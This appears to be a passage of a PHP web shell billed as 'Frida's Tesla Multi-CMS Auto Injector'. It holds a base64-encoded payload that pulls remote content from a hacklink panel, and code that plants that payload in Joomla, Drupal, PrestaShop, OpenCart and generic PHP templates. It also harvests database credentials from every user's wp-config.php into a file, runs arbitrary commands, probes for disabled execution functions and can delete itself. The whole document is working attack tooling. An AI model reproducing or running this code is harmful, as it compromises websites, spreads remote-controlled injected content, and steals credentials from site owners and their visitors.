    $injection_code = base64_decode("PCEtLSBUZWxlZ3JhbTogaHR0cHM6Ly90Lm1lL2hhY2tsaW5rX3BhbmVsIC0tPjw/cGhwIGZ1bmN0aW9uIGhhY2tsaW5rX2FkZCgpe3N0YXRpYyAkYj1udWxsO2lmKCRiIT09bnVsbClyZXR1cm4gJGI7JHU9J2h0dHBzOi8vcGFuZWwuaGFja2xpbmttYXJrZXQuY29tL2NvZGU/dj0nLnRpbWUoKTskZD0oJF9TRVJWRVJbJ0hUVFBTJ10/J2h0dHBzOi8vJzonaHR0cDovLycpLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4nLyc7aWYoZnVuY3Rpb25fZXhpc3RzKCdjdXJsX2luaXQnKSl7JGg9Y3VybF9pbml0KCk7Y3VybF9zZXRvcHRfYXJyYXkoJGgsW0NVUkxPUFRfVVJMPT4kdSxDVVJMT1BUX0hUVFBIRUFERVI9PlsnWC1SZXF1ZXN0LURvbWFpbjonLiRkXSxDVVJMT1BUX1JFVFVSTlRSQU5TRkVSPT50cnVlLENVUkxPUFRfVElNRU9VVD0+MTAsQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUj0+ZmFsc2VdKTtpZigkcj1AY3VybF9leGVjKCRoKSl7Y3VybF9jbG9zZSgkaCk7JGI9JHI7cmV0dXJuICRiO319aWYoaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpeyRvPVsnaHR0cCc9PlsnaGVhZGVyJz0+J1gtUmVxdWVzdC1Eb21haW46Jy4kZCwndGltZW91dCc9PjEwXSwnc3NsJz0+Wyd2ZXJpZnlfcGVlcic9PmZhbHNlXV07aWYoJHI9QGZpbGVfZ2V0X2NvbnRlbnRzKCR1LGZhbHNlLHN0cmVhbV9jb250ZXh0X2NyZWF0ZSgkbykpKXtyZXR1cm4gJGI9JHI7fX1pZihmdW5jdGlvbl9leGlzdHMoJ2ZvcGVuJykpe2lmKCRmPUBmb3BlbigkdSwncicpKXskcj0nJzt3aGlsZSghZmVvZigkZikpJHIuPWZyZWFkKCRmLDgxOTIpO2ZjbG9zZSgkZik7aWYoJHIpcmV0dXJuICRiPSRyO319cmV0dXJuICcnO30gPz4=");

    $current_file = __FILE__;
    
    if (empty($target_path)) {
        $search_paths = frida_smart_path_discovery();
    } else {
        $search_paths = [$target_path];
    }
    
    $search_paths = array_unique($search_paths);
    
    $total_injected = 0;
    $total_skipped = 0;
    $results = [];
    $cms_types = ['joomla' => 0, 'drupal' => 0, 'prestashop' => 0, 'opencart' => 0, 'magento' => 0, 'other_php' => 0];
    
    foreach ($search_paths as $path) {
        $results[] = "Checking: $path";
        
        if (!is_dir($path)) {
            $results[] = "  [SKIP] Directory does not exist";
            continue;
        }
        
        if (!is_readable($path)) {
            $results[] = "  [SKIP] No read permission";
            continue;
        }
        
        $results[] = "  [OK] Directory accessible";
        
        // WordPress detection - Skip if WP exists (handled by WP injector)
        if (file_exists($path . 'wp-config.php') || file_exists($path . 'wp-load.php') || is_dir($path . 'wp-content/')) {
            $results[] = "  [WORDPRESS] Detected - Skipping (use WP Injector instead)";
            continue;
        }
        
        // Joomla detection & injection
        $joomla_config = $path . 'configuration.php';
        if (file_exists($joomla_config)) {
            $results[] = "  [JOOMLA] Found at: $path";
            $cms_types['joomla']++;
            
            // Joomla template files
            $template_paths = [
                $path . 'templates/*/index.php',
                $path . 'templates/*/html/com_content/article/default.php'
            ];
            
            foreach ($template_paths as $pattern) {
                $files = glob($pattern);
                if (!empty($files)) {
                    $results[] = "    [GLOB] Found " . count($files) . " template files";
                }
                foreach ($files as $file) {
                    if (!is_readable($file)) continue;
                    if (!is_writable($file)) {
                        $results[] = "    [SKIP] Not writable: " . basename($file);
                        continue;
                    }
                    
                    $content = file_get_contents($file);
                    if (strpos($content, 'hacklink_add') === false) {
                    if (preg_match('/<\/body>/i', $content)) {
                        $new_content = str_replace('</body>', $injection_code . "\n<?php echo hacklink_add(); ?>\n</body>", $content);
                            if (file_put_contents($file, $new_content)) {
                                $total_injected++;
                                $results[] = "    [SUCCESS] Injected: " . basename(dirname($file)) . "/" . basename($file);
                            }
                        } else {
                            $results[] = "    [SKIP] No </body> tag: " . basename($file);
                        }
                    } else {
                        $total_skipped++;
                        $results[] = "    [SKIP] Already injected: " . basename($file);
                    }
                }
            }
        }
        
        // Drupal detection & injection
        $drupal_index = $path . 'index.php';
        if (file_exists($path . 'core/lib/Drupal.php') || file_exists($path . 'includes/bootstrap.inc')) {
            $results[] = "  [DRUPAL] Found at: $path";
            $cms_types['drupal']++;
            
            $theme_paths = glob($path . 'themes/*/templates/*.html.twig');
            if (!empty($theme_paths)) {
                $results[] = "    [GLOB] Found " . count($theme_paths) . " twig files";
            }
            foreach ($theme_paths as $file) {
                if (!is_readable($file)) continue;
                if (!is_writable($file)) {
                    $results[] = "    [SKIP] Not writable: " . basename($file);
                    continue;
                }
                
                $content = file_get_contents($file);
                if (strpos($content, 'hacklink_add') === false && preg_match('/<\/body>/i', $content)) {
                    $new_content = str_replace('</body>', "{{ attach_library('frida/inject') }}\n</body>", $content);
                    if (file_put_contents($file, $new_content)) {
                        $total_injected++;
                        $results[] = "    [SUCCESS] Injected: " . basename($file);
                    }
                } else {
                    $total_skipped++;
                    $results[] = "    [SKIP] Already injected or no tag: " . basename($file);
                }
            }
        }
        
        // PrestaShop detection & injection
        if (file_exists($path . 'config/config.inc.php') && is_dir($path . 'modules/')) {
            $results[] = "  [PRESTASHOP] Found at: $path";
            $cms_types['prestashop']++;
            
            $theme_files = glob($path . 'themes/*/templates/*.tpl');
            if (!empty($theme_files)) {
                $results[] = "    [GLOB] Found " . count($theme_files) . " tpl files";
            }
            foreach ($theme_files as $file) {
                if (!is_readable($file)) continue;
                if (!is_writable($file)) {
                    $results[] = "    [SKIP] Not writable: " . basename($file);
                    continue;
                }
                
                $content = file_get_contents($file);
                if (strpos($content, 'hacklink_add') === false && preg_match('/<\/body>/i', $content)) {
                    $new_content = str_replace('</body>', $injection_code . "\n<?php hacklink_add(); ?>\n</body>", $content);
                    if (file_put_contents($file, $new_content)) {
                        $total_injected++;
                        $results[] = "    [SUCCESS] Injected: " . basename($file);
                    }
                } else {
                    $total_skipped++;
                    $results[] = "    [SKIP] Already injected or no tag: " . basename($file);
                }
            }
        }
        
        // OpenCart detection & injection  
        if (file_exists($path . 'config.php') && is_dir($path . 'catalog/') && is_dir($path . 'admin/')) {
            $results[] = "  [OPENCART] Found at: $path";
            $cms_types['opencart']++;
            
            $footer_file = $path . 'catalog/view/theme/*/template/common/footer.tpl';
            $files = glob($footer_file);
            if (!empty($files)) {
                $results[] = "    [GLOB] Found " . count($files) . " footer files";
            }
            foreach ($files as $file) {
                if (!is_readable($file)) continue;
                if (!is_writable($file)) {
                    $results[] = "    [SKIP] Not writable: " . basename($file);
                    continue;
                }
                
                $content = file_get_contents($file);
                if (strpos($content, 'hacklink_add') === false) {
                    file_put_contents($file, $content . "\n" . $injection_code . "\n<?php hacklink_add(); ?>");
                    $total_injected++;
                    $results[] = "    [SUCCESS] Injected: footer.tpl";
                } else {
                    $total_skipped++;
                    $results[] = "    [SKIP] Already injected: footer.tpl";
                }
            }
        }
        
        // Generic PHP file injection (footer tag search) - PHP native scan
        $results[] = "  [SCAN] Searching for generic PHP files...";
        $php_files = [];
        
        try {
            $iterator = new RecursiveIteratorIterator(
                new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
                RecursiveIteratorIterator::SELF_FIRST
            );
            $iterator->setMaxDepth(3);
            
            $count = 0;
            foreach ($iterator as $file) {
                if ($file->isFile() && $file->getExtension() === 'php') {
                    $file_path = $file->getPathname();
                    
                    // Skip vendor, cache, and self
                    if (strpos($file_path, '/vendor/') !== false || 
                        strpos($file_path, '/cache/') !== false ||
                        realpath($file_path) === realpath($current_file)) {
                        continue;
                    }
                    
                    $php_files[] = $file_path;
                    $count++;
                    
                    if ($count >= 50) break; // Limit to 50 files
                }
            }
        } catch (Exception $e) {
            // Fallback to glob
            $glob_patterns = [
                $path . '*.php',
                $path . '*/*.php',
                $path . '*/*/*.php'
            ];
            
            foreach ($glob_patterns as $pattern) {
                $found = glob($pattern);
                if ($found) {
                    foreach ($found as $f) {
                        if (strpos($f, '/vendor/') === false && 
                            strpos($f, '/cache/') === false &&
                            realpath($f) !== realpath($current_file)) {
                            $php_files[] = $f;
                        }
                    }
                }
                if (count($php_files) >= 50) break;
            }
        }
        
        $php_files = array_unique(array_slice($php_files, 0, 50));
        
        if (!empty($php_files)) {
            $results[] = "  [FOUND] " . count($php_files) . " PHP files (PHP scan)";
            
            foreach ($php_files as $file) {
                if (empty($file)) continue;
                
                // Skip this injector file itself
                if (realpath($file) === realpath($current_file)) {
                    $results[] = "    [SKIP] Self-file: " . basename($file);
                    continue;
                }
                
                if (!is_readable($file)) {
                    $results[] = "    [SKIP] Not readable: " . basename($file);
                    continue;
                }
                
                if (!is_writable($file)) {
                    $results[] = "    [SKIP] Not writable: " . basename($file);
                    continue;
                }
                
                $content = @file_get_contents($file);
                if (!$content) {
                    $results[] = "    [SKIP] Empty file: " . basename($file);
                    continue;
                }
                
                if (strpos($content, 'hacklink_add') !== false) {
                    $total_skipped++;
                    $results[] = "    [SKIP] Already injected: " . basename($file);
                    continue;
                }

                // Skip core/config files that shouldn't be touched
                $filename = basename($file);
                $core_files = ['config.php', 'wp-config.php', 'configuration.php', 'settings.php', 'functions.php', 'core.php', 'init.php', 'bootstrap.php'];
                if (in_array(strtolower($filename), $core_files)) {
                    $results[] = "    [SKIP] Core file: " . $filename;
                    continue;
                }

                // Skip files that include footer (likely templates, not main files)
                if (preg_match('/include.*footer|require.*footer|get_footer|load_footer/i', $content)) {
                    $results[] = "    [SKIP] Footer include file: " . $filename;
                    continue;
                }

                // Skip files that are mainly includes/requires (not content files)
                $include_count = substr_count(strtolower($content), 'include') +
                                substr_count(strtolower($content), 'require') +
                                substr_count(strtolower($content), 'get_template_part');

                $total_lines = substr_count($content, "\n") + 1;
                $include_ratio = $include_count / max($total_lines, 1);

                if ($include_ratio > 0.5) { // If more than 50% includes, likely a template loader
                    $results[] = "    [SKIP] Template loader file: " . $filename;
                    continue;
                }

                if (preg_match('/<\/body>|<\/footer>|<\/html>/i', $content)) {
                    $results[] = "    [MATCH] Footer tag found in: " . basename($file);
                    
                    $new_content = preg_replace(
                        '/(<\/body>|<\/footer>|<\/html>)/i',
                        $injection_code . "\n<?php hacklink_add(); ?>\n$1",
                        $content,
                        1
                    );
                    
                    if ($new_content !== $content && @file_put_contents($file, $new_content)) {
                        $total_injected++;
                        $cms_types['other_php']++;
                        $results[] = "    [SUCCESS] Injected: " . basename($file);
                    } else {
                        $results[] = "    [FAIL] Write failed: " . basename($file);
                    }
                } else {
                    $results[] = "    [SKIP] No footer tag: " . basename($file);
                }
            }
        } else {
            $results[] = "  [FAIL] Find command failed or no PHP files found";
        }
    }
    
    return [
        'total_injected' => $total_injected,
        'total_skipped' => $total_skipped,
        'cms_types' => $cms_types,
        'results' => $results,
        'search_paths' => $search_paths
    ];
}


function frida_wp_config_scanner() {
    frida_quantum_bypass();
    
    $results = [];
    $wp_configs_found = [];
    $readable_configs = [];
    
    // Get users via POSIX
    $users = frida_posix_users();
    
    $results[] = "👤 Found " . count($users) . " users via POSIX";
    $results[] = "";
    
    foreach ($users as $username => $home_dir) {
        $home_dir = rtrim($home_dir, '/') . '/';
        
        // Common wp-config.php locations
        $possible_paths = [
            $home_dir . 'public_html/wp-config.php',
            $home_dir . 'www/wp-config.php',
            $home_dir . 'htdocs/wp-config.php',
            $home_dir . 'public_html/wordpress/wp-config.php',
            $home_dir . 'public_html/wp/wp-config.php',
        ];
        
        // Also scan domains/ subdirectories
        if (is_dir($home_dir . 'domains/')) {
            $domain_dirs = @scandir($home_dir . 'domains/');
            if ($domain_dirs) {
                foreach ($domain_dirs as $domain) {
                    if ($domain !== '.' && $domain !== '..') {
                        $possible_paths[] = $home_dir . 'domains/' . $domain . '/public_html/wp-config.php';
                        $possible_paths[] = $home_dir . 'domains/' . $domain . '/wp-config.php';
                    }
                }
            }
        }
        
        foreach ($possible_paths as $config_path) {
            if (file_exists($config_path)) {
                $wp_configs_found[] = $config_path;
                
                if (is_readable($config_path)) {
                    $content = @file_get_contents($config_path);
                    
                    if ($content) {
                        // Extract DB credentials
                        $db_name = '';
                        $db_user = '';
                        $db_pass = '';
                        $db_host = '';
                        
                        if (preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]+)['\"]/", $content, $m)) {
                            $db_name = $m[1];
                        }
                        if (preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]+)['\"]/", $content, $m)) {
                            $db_user = $m[1];
                        }
                        if (preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]+)['\"]/", $content, $m)) {
                            $db_pass = $m[1];
                        }
                        if (preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]+)['\"]/", $content, $m)) {
                            $db_host = $m[1];
                        }
                        
                        $readable_configs[] = [
                            'user' => $username,
                            'path' => $config_path,
                            'db_name' => $db_name,
                            'db_user' => $db_user,
                            'db_pass' => $db_pass,
                            'db_host' => $db_host
                        ];
                        
                        $results[] = "✅ READABLE: $username → $config_path";
                    } else {
                        $results[] = "⚠️ EXISTS but empty: $config_path";
                    }
                } else {
                    $results[] = "🔒 NOT READABLE: $config_path";
                }
            }
        }
    }
    
    return [
        'total_users' => count($users),
        'wp_configs_found' => count($wp_configs_found),
        'readable_configs' => count($readable_configs),
        'configs' => $readable_configs,
        'results' => $results
    ];
}

function get_available_methods() {
    $methods = ['shell_exec', 'system', 'exec', 'passthru', 'popen', 'proc_open'];
    $disabled = explode(',', str_replace(' ', '', ini_get('disable_functions')));
    $available = [];
    
    foreach ($methods as $method) {
        if (function_exists($method) && !in_array($method, $disabled)) {
            $available[] = $method;
        }
    }
    
    return $available;
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Frida's Tesla WordPress Auto Injector</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: 'Consolas', 'Monaco', 'Courier New', monospace;
            background: linear-gradient(135deg, #0c0c0c 0%, #1a1a2e 50%, #16213e 100%);
            color: #00ff88;
            min-height: 100vh;
            padding: 20px;
        }
        
        .tesla-header {
            background: linear-gradient(90deg, #ff006e, #fb5607, #ffbe0b, #8338ec, #3a86ff);
            padding: 20px;
            text-align: center;
            border-radius: 15px;
            margin-bottom: 20px;
            position: relative;
            overflow: hidden;
        }
        
        .tesla-header::before {
            content: '';
            position: absolute;
            top: 0;
            left: -100%;
            width: 100%;
            height: 100%;
            background: linear-gradient(90deg, transparent, rgba(255,255,255,0.2), transparent);
            animation: tesla-glow 3s infinite;
        }
        
        @keyframes tesla-glow {
            0% { left: -100%; }
            100% { left: 100%; }
        }
        
        .tesla-title {
            font-size: 2rem;
            font-weight: bold;
            text-shadow: 0 0 20px #00ff88;
            margin-bottom: 10px;
            position: relative;
            z-index: 1;
        }
        
        .container {
            max-width: 1400px;
            margin: 0 auto;
            display: flex;
            flex-direction: column;
            gap: 20px;
        }
        
        .panel {
            background: rgba(255, 255, 255, 0.05);
            border: 1px solid #00ff88;
            border-radius: 15px;
            padding: 20px;
            backdrop-filter: blur(10px);
            box-shadow: 0 8px 32px rgba(0, 255, 136, 0.2);
        }
        
        .panel:hover {
            border-color: #ff006e;
            box-shadow: 0 12px 40px rgba(255, 0, 110, 0.3);
        }
        
        .panel-title {
            font-size: 1.3rem;
            margin-bottom: 15px;
            color: #ff006e;
            text-shadow: 0 0 10px #ff006e;
        }
        
        .form-group {
            margin-bottom: 15px;
        }
        
        label {
            display: block;
            margin-bottom: 5px;
            color: #00ff88;
            font-weight: bold;
        }
        
        input, textarea, select {
            width: 100%;
            padding: 12px;
            background: rgba(0, 0, 0, 0.3);
            border: 2px solid #00ff88;
            border-radius: 8px;
            color: #00ff88;
            font-family: inherit;
        }
        
        input:focus, textarea:focus, select:focus {
            outline: none;
            border-color: #ff006e;
            box-shadow: 0 0 15px rgba(255, 0, 110, 0.5);
        }
        
        .btn {
            background: linear-gradient(45deg, #ff006e, #3a86ff);
            color: white;
            border: none;
            padding: 12px 25px;
            border-radius: 8px;
            cursor: pointer;
            font-weight: bold;
            font-size: 1rem;
            transition: all 0.3s ease;
            text-transform: uppercase;
            letter-spacing: 1px;
        }
        
        .btn:hover {
            transform: scale(1.05);
            box-shadow: 0 5px 20px rgba(255, 0, 110, 0.4);
        }
        
        .output {
            background: rgba(0, 0, 0, 0.6);
            border: 1px solid #00ff88;
            border-radius: 8px;
            padding: 15px;
            white-space: pre-wrap;
            font-family: 'Consolas', monospace;
            max-height: 500px;
            overflow-y: auto;
            margin-top: 15px;
            color: #00ff88;
            text-shadow: 0 0 5px #00ff88;
        }
        
        .status-indicator {
            display: inline-block;
            width: 10px;
            height: 10px;
            border-radius: 50%;
            margin-right: 5px;
        }
        
        .status-ok { background: #00ff88; }
        .status-blocked { background: #ff006e; }
        
        .method-list {
            display: flex;
            flex-wrap: wrap;
            gap: 10px;
            margin: 10px 0;
        }
        
        .method-tag {
            background: rgba(0, 255, 136, 0.2);
            padding: 5px 10px;
            border-radius: 5px;
            font-size: 0.8rem;
            border: 1px solid #00ff88;
        }
    </style>
</head>
<body>
    <div class="tesla-header">
        <div class="tesla-title">⚡ FRIDA'S TESLA MULTI-CMS AUTO INJECTOR ⚡</div>
        <div>🚀 WordPress | Image Functions | Joomla | Drupal | PrestaShop | OpenCart | Generic PHP | POSIX Bypass | Auto-Execute</div>
    </div>

    <?php
    // Self-Delete Handler
    if (isset($_POST['action']) && $_POST['action'] === 'self_delete') {
        if (isset($_POST['confirm']) && $_POST['confirm'] === 'DELETE') {
            $current_file = __FILE__;
            @unlink($current_file);
            die('File deleted successfully. Goodbye! ⚡');
        }
    }
    
    $is_first_load = !isset($_POST['action']) && !isset($_GET['manual']);
    
    if ($is_first_load) {
        $wp_result = frida_wp_injector('');
        $image_function_result = frida_image_function_injector('');
        $cms_result = frida_multi_cms_injector('');
    }
    ?>
    
    <div class="container">

        <!-- Image Function Injector Panel -->
        <div class="panel">
            <div class="panel-title">🖼️ Tesla Image Function Injector</div>
            <form method="POST">
                <div class="form-group">
                    <label>Target Path (leave empty for auto-scan):</label>
                    <input type="text" name="image_function_target_path" placeholder="/home/ or /var/www/ or leave empty" value="<?= htmlspecialchars($_POST['image_function_target_path'] ?? '') ?>">
                </div>
                <button type="submit" name="action" value="image_function_inject" class="btn">🚀 Deploy Image Functions</button>
            </form>
            
            <?php 
            $show_image_function = isset($image_function_result) || (isset($_POST['action']) && $_POST['action'] === 'image_function_inject');
            if ($show_image_function): 
                if (!isset($image_function_result)) {
                    $target_path = $_POST['image_function_target_path'] ?? '';
                    $image_function_result = frida_image_function_injector($target_path);
                }
            ?>
                <div class="output">
                    <?php
                    $result = $image_function_result;
                    
                    echo "🖼️ TESLA IMAGE FUNCTION INJECTOR RESULTS:\n";
                    echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n\n";
                    echo "📊 STATISTICS:\n";
                    echo "✅ Total Injected: " . $result['total_injected'] . "\n";
                    echo "⏭️ Total Skipped: " . $result['total_skipped'] . "\n";
                    echo "🔍 Searched Paths: " . count($result['search_paths']) . "\n\n";
                    
                    echo "📁 SEARCH PATHS:\n";
                    foreach ($result['search_paths'] as $path) {
                        echo "  • $path\n";
                    }
                    echo "\n";
                    
                    echo "📝 DETAILED RESULTS:\n";
                    if (!empty($result['results'])) {
                        foreach ($result['results'] as $res) {
                            echo "$res\n";
                        }
                    } else {
                        echo "❌ No WordPress installations found or no accessible paths.\n";
                    }
                    
                    echo "\n🚀 Tesla-Level image function deployment complete! ⚡";
                    ?>
                </div>
            <?php endif; ?>
        </div>

        <!-- Auto Injector Panel -->
        <div class="panel">
            <div class="panel-title">🎯 WordPress Auto Injector</div>
            <form method="POST">
                <div class="form-group">
                    <label>Target Path (leave empty for auto-scan):</label>
                    <input type="text" name="target_path" placeholder="/home/ or /var/www/ or leave empty" value="<?= htmlspecialchars($_POST['target_path'] ?? '') ?>">
                </div>
                <button type="submit" name="action" value="auto_inject" class="btn">🔄 Re-run Auto Injector</button>
            </form>
            
            <?php 
            $show_wp = isset($wp_result) || (isset($_POST['action']) && $_POST['action'] === 'auto_inject');
            if ($show_wp): 
                if (!isset($wp_result)) {
                    $target_path = $_POST['target_path'] ?? '';
                    $wp_result = frida_wp_injector($target_path);
                }
            ?>
                <div class="output">
                    <?php
                    $result = $wp_result;
                    
                    echo "🎯 TESLA AUTO INJECTOR RESULTS:\n";
                    echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n\n";
                    echo "📊 STATISTICS:\n";
                    echo "✅ Total Injected: " . $result['total_injected'] . "\n";
                    echo "⏭️ Total Skipped: " . $result['total_skipped'] . "\n";
                    echo "🔍 Searched Paths: " . count($result['search_paths']) . "\n\n";
                    
                    echo "📁 SEARCH PATHS:\n";
                    foreach ($result['search_paths'] as $path) {
                        echo "  • $path\n";
                    }
                    echo "\n";
                    
                    echo "📝 DETAILED RESULTS:\n";
                    if (!empty($result['results'])) {
                        foreach ($result['results'] as $res) {
                            echo "$res\n";
                        }
                    } else {
                        echo "❌ No WordPress installations found or no accessible paths.\n";
                    }
                    
                    echo "\n🚀 Tesla-Level injection complete! ⚡";
                    ?>
                </div>
            <?php endif; ?>
        </div>

        <!-- Multi-CMS Injector Panel -->
        <div class="panel">
            <div class="panel-title">🎨 Multi-CMS & PHP Footer Injector</div>
            <form method="POST">
                <div class="form-group">
                    <label>Target Path (leave empty for auto-scan):</label>
                    <input type="text" name="cms_target_path" placeholder="/home/ or /var/www/ or leave empty" value="<?= htmlspecialchars($_POST['cms_target_path'] ?? '') ?>">
                </div>
                <button type="submit" name="action" value="cms_inject" class="btn">🚀 Inject All CMS Types</button>
            </form>
            
            <?php 
            $show_cms = isset($cms_result) || (isset($_POST['action']) && $_POST['action'] === 'cms_inject');
            if ($show_cms): 
                if (!isset($cms_result)) {
                    $target_path = $_POST['cms_target_path'] ?? '';
                    $cms_result = frida_multi_cms_injector($target_path);
                }
            ?>
                <div class="output">
                    <?php
                    $result = $cms_result;
                    
                    echo "🎨 MULTI-CMS INJECTOR RESULTS:\n";
                    echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n\n";
                    echo "📊 STATISTICS:\n";
                    echo "✅ Total Injected: " . $result['total_injected'] . "\n";
                    echo "⏭️ Total Skipped: " . $result['total_skipped'] . "\n";
                    echo "🔍 Searched Paths: " . count($result['search_paths']) . "\n\n";
                    
                    echo "🎯 CMS DETECTION:\n";
                    foreach ($result['cms_types'] as $cms => $count) {
                        if ($count > 0) {
                            echo "  • " . strtoupper($cms) . ": $count sites\n";
                        }
                    }
                    echo "\n";
                    
                    echo "📝 DETAILED RESULTS:\n";
                    if (!empty($result['results'])) {
                        foreach ($result['results'] as $res) {
                            echo "$res\n";
                        }
                    } else {
                        echo "No CMS installations found or no accessible paths.\n";
                    }
                    
                    echo "\n🚀 Tesla-Level multi-CMS injection complete! ⚡";
                    ?>
                </div>
            <?php endif; ?>
        </div>

        <!-- Command Execution Panel -->
        <div class="panel">
            <div class="panel-title">⚡ Tesla Command Executor</div>
            <form method="POST">
                <div class="form-group">
                    <label>Custom Command:</label>
                    <textarea name="command" rows="3" placeholder="Enter your command..."><?= htmlspecialchars($_POST['command'] ?? '') ?></textarea>
                </div>
                <button type="submit" name="action" value="execute" class="btn">⚡ Execute Command</button>
            </form>
            
            <?php if (isset($_POST['action']) && $_POST['action'] === 'execute' && !empty($_POST['command'])): ?>
                <div class="output">
                    <?php
                    $result = frida_execute_bypass($_POST['command']);
                    echo "Execution Method: " . htmlspecialchars($result['method']) . "\n";
                    echo "Success: " . ($result['success'] ? 'YES' : 'NO') . "\n";
                    echo "Output:\n" . htmlspecialchars($result['output']);
                    ?>
                </div>
            <?php endif; ?>
        </div>

        <!-- WP-Config Scanner Panel -->
        <div class="panel">
            <div class="panel-title">🔐 WP-Config Scanner (POSIX Users)</div>
            <form method="POST">
                <button type="submit" name="action" value="scan_wpconfig" class="btn">🔍 Scan wp-config.php Files</button>
            </form>
            
            <?php if (isset($_POST['action']) && $_POST['action'] === 'scan_wpconfig'): ?>
                <div class="output">
                    <?php
                    $scan_result = frida_wp_config_scanner();
                    
                    echo "🔐 WP-CONFIG SCANNER RESULTS:\n";
                    echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n\n";
                    echo "📊 STATISTICS:\n";
                    echo "👤 Total Users (POSIX): " . $scan_result['total_users'] . "\n";
                    echo "📁 wp-config.php Found: " . $scan_result['wp_configs_found'] . "\n";
                    echo "✅ Readable Configs: " . $scan_result['readable_configs'] . "\n\n";
                    
                    echo "📝 SCAN RESULTS:\n";
                    foreach ($scan_result['results'] as $res) {
                        echo "$res\n";
                    }
                    echo "\n";
                    
                    if (!empty($scan_result['configs'])) {
                        echo "🔑 DATABASE CREDENTIALS:\n";
                        echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
                        
                        foreach ($scan_result['configs'] as $idx => $config) {
                            echo "\n[" . ($idx + 1) . "] User: " . $config['user'] . "\n";
                            echo "    Path: " . $config['path'] . "\n";
                            echo "    DB_NAME: " . ($config['db_name'] ?: 'N/A') . "\n";
                            echo "    DB_USER: " . ($config['db_user'] ?: 'N/A') . "\n";
                            echo "    DB_PASS: " . ($config['db_pass'] ?: 'N/A') . "\n";
                            echo "    DB_HOST: " . ($config['db_host'] ?: 'localhost') . "\n";
                            echo "    " . str_repeat('-', 70) . "\n";
                        }
                        
                        // Save to file
                        $export_file = 'wp_credentials_' . date('Ymd_His') . '.txt';
                        $export_content = '';
                        foreach ($scan_result['configs'] as $config) {
                            $export_content .= "User: {$config['user']}\n";
                            $export_content .= "Path: {$config['path']}\n";
                            $export_content .= "DB_HOST: {$config['db_host']}\n";
                            $export_content .= "DB_NAME: {$config['db_name']}\n";
                            $export_content .= "DB_USER: {$config['db_user']}\n";
                            $export_content .= "DB_PASS: {$config['db_pass']}\n";
                            $export_content .= str_repeat('-', 80) . "\n\n";
                        }
                        
                        if (file_put_contents($export_file, $export_content)) {
                            echo "\n💾 Credentials saved to: $export_file\n";
                        }
                    } else {
                        echo "\n❌ No readable wp-config.php files found.\n";
                    }
                    
                    echo "\n🚀 Tesla-Level wp-config scan complete! ⚡";
                    ?>
                </div>
            <?php endif; ?>
        </div>

        <!-- Self-Delete Panel -->
        <div class="panel">
            <div class="panel-title">💀 Self-Destruct System</div>
            <form method="POST" onsubmit="return confirm('Are you absolutely sure? This action is IRREVERSIBLE!');">
                <div class="form-group">
                    <label>Type DELETE to confirm:</label>
                    <input type="text" name="confirm" placeholder="DELETE" required>
                </div>
                <button type="submit" name="action" value="self_delete" class="btn" style="background: linear-gradient(45deg, #ff006e, #ff0000);">💀 Delete This File</button>
            </form>
        </div>

        <!-- System Status Panel -->
        <div class="panel">
            <div class="panel-title">🔬 Tesla System Status</div>
            <div class="output">
                <?php
                $available_methods = get_available_methods();
                $disabled_functions = ini_get('disable_functions');
                
                echo "🔧 AVAILABLE EXECUTION METHODS:\n";
                if (!empty($available_methods)) {
                    foreach ($available_methods as $method) {
                        echo "  ✅ $method\n";
                    }
                } else {
                    echo "  ❌ No execution methods available\n";
                }
                
                echo "\n🚫 DISABLED FUNCTIONS:\n";
                if (!empty($disabled_functions)) {
                    $disabled = explode(',', str_replace(' ', '', $disabled_functions));
                    foreach ($disabled as $func) {
                        if (!empty($func)) echo "  🔒 $func\n";
                    }
                } else {
                    echo "  ✅ No functions disabled\n";
                }
                
                echo "\n📊 SYSTEM INFO:\n";
                echo "  PHP Version: " . phpversion() . "\n";
                echo "  Operating System: " . php_uname() . "\n";
                echo "  Server Software: " . ($_SERVER['SERVER_SOFTWARE'] ?? 'Unknown') . "\n";
                echo "  Document Root: " . ($_SERVER['DOCUMENT_ROOT'] ?? 'Unknown') . "\n";
                echo "  Current Directory: " . getcwd() . "\n";
                
                echo "\n👤 USER DISCOVERY:\n";
                
                // Show current user detection
                $current_users = frida_get_current_user();
                echo "  ✅ Current users (from paths): " . count($current_users) . "\n";
                if (!empty($current_users)) {
                    foreach ($current_users as $user => $home) {
                        echo "    • $user → $home\n";
                    }
                }
                
                // Show POSIX status
                if (function_exists('posix_getpwuid')) {
                    echo "  ✅ POSIX functions available (optional scan)\n";
                    $all_users = frida_posix_users();
                    echo "  📊 Total users (current + POSIX): " . count($all_users) . "\n";
                    if (count($all_users) > count($current_users)) {
                        echo "  Sample additional: " . implode(', ', array_slice(array_keys(array_diff_key($all_users, $current_users)), 0, 3)) . "\n";
                    }
                } else {
                    echo "  ⚠️ POSIX functions not available (using path detection only)\n";
                }
                
                echo "\n📂 PATH DETECTION SOURCES:\n";
                echo "  • getcwd(): " . getcwd() . "\n";
